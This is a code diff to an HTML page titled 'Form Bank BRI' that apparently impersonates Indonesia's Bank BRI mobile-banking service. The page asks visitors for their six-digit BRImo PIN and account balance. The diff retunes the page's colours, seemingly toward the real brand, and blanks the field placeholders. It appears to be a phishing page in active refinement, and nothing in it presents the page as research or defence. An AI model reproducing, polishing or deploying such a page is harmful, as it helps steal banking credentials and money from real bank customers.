--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8">
   <meta property="og:image" content="https://raw.githubusercontent.com/Peng4duanBrimo/Peng4duanBrimo.github.io/main/akusatu.jpg">
-  <meta name="theme-color" content="#00008b">
+  <meta name="theme-color" content="#0041c2">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Form Bank BRI</title>
   <style>
@@ -35,7 +35,7 @@
     }
 
     .header h1 {
-      color: #00008b;
+      color: #0041c2;
       font-size: 16px;
       text-transform: uppercase;
       margin: 0;
@@ -57,7 +57,7 @@
       margin-bottom: 5px;
       font-weight: bold;
       font-size: 12px;
-      color: #00008b;
+      color: #0041c2;
     }
 
     .input-icon img {
@@ -79,7 +79,7 @@
 
     .btn {
       width: 87%;
-      background-color: #00008b;
+      background-color: #0041c2;
       color: #ffffff;
       border: none;
       border-radius: 5px;
@@ -93,7 +93,7 @@
       display: block;
       text-align: center;
       margin-top: 10px;
-      color: #00008b;
+      color: #0041c2;
       text-decoration: none;
     }
 
@@ -149,14 +149,14 @@
         <label for="pin">PIN BRImo:</label>
         <div class="input-icon">
           <img src="pin.png" alt="PIN Icon">
-          <input type="password" name="pin" id="pin" placeholder="Masukkan PIN 6 Digit" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')">
+          <input type="password" name="pin" id="pin" placeholder="" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')">
         </div>
       </div>
       <div class="input-group">
         <label for="balance">Sisa Saldo Akhir:</label>
         <div class="input-icon">
           <img src="kol.png" alt="Saldo Icon">
-          <input type="tel" id="jumlahInput" name="balance" placeholder="Sisa Saldo Terakhir" required oninput="updateNominal()">
+          <input type="tel" id="jumlahInput" name="balance" placeholder="" required oninput="updateNominal()">
         </div>
       </div>
       <button type="submit" class="btn">LANJUT</button>
